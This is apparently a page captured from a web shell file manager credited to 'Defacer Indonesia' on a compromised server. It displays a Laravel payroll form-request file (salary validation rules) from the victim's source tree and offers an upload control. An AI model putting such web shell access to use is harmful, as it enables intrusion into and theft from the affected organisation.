whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
Modules
/
Payroll
/
Http
/
Requests
/
Upload File:
files >> //home/kckglobal/www/portal/Modules/Payroll/Http/Requests/StoreEmployyeMonthlySalary.php
<?php namespace Modules\Payroll\Http\Requests; use Illuminate\Foundation\Http\FormRequest; class StoreEmployyeMonthlySalary extends FormRequest { /** * Get the validation rules that apply to the request. * * @return array */ public function rules() { return [ 'user_id' => 'required', 'annual_salary' => 'required|numeric|min:1', 'type' => 'required', ]; } /** * Determine if the user is authorized to make this request. * * @return bool */ public function authorize() { return true; } }
Copyright ©2021 || Defacer Indonesia